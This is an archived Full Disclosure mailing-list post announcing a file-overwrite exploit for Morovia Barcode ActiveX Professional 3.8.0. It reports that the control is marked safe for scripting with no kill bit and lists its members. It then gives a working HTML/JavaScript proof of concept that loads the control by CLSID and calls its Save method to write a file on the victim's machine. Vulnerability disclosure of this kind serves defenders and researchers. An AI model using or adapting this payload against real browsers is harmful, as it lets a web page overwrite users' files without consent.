Home page logo
  • Nmap Security Scanner
  • Security Lists
  • Security Tools
  • Site News
  • Advertising
  • About/Contact
  • Sponsors:



/

fulldisclosure logo Full Disclosure mailing list archives

Morovia Barcode ActiveX Professional 3 File Overwrite Exploit
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Tue, 24 Jul 2012 16:34:42 -0700
Exploit Title: Morovia Barcode ActiveX Professional 3 File Overwrite Exploit
Date: July 24, 2012
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.morovia.com/component/barcode-activex/
Version: 3.8.0
Tested on: windows 7

awesome coolkaveh

==========================================================================
Class MrvBarcode
GUID: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
Number of Interfaces: 1
Default Interface: IBarcode
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
Members : 127
        BackColor
        BorderColor
        BorderStyle
        BorderWidth
        ForeColor
        Comment
        CommentMarginLeft
        CommentMarginRight
        CommentMarginTop
        CommentMarginBottom
        BarHeight
        BarWidthReduction
        message
        NarrowBarWidth
        NarrowToWideRatio
        SymbolMarginTop
        SymbolMarginBottom
        SymbolMarginLeft
        SymbolMarginRight
        LabelHeight
        LabelWidth
        ZoomRatio
        RasterImageResolution
        FeatureKey
        DataMatrixModuleSize
        Save
        Load
        ExportImage
        PDFAspectRatio
        PDFMaxCols
        PDFMaxRows
        PDFModuleHeight
        PDFModuleWidth
        PDFPctOverhead
        PDFSecurityLevel
        MaxicodeClass
        MaxicodeMode
        MaxicodeCountryCode
        MaxicodeZipCode
============================================================================
<title>Morovia Barcode ActiveX </title>
<BODY>
 <object id=coolkaveh
classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>

<SCRIPT>

function go()
 {
     File = "coolkaveh.txt"
     coolkaveh.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=go() type=button value="Click here
To Test"><br>
</body>
</HTML>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Morovia Barcode ActiveX Professional 3 File Overwrite Exploit kaveh ghaemmaghami (Jul 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]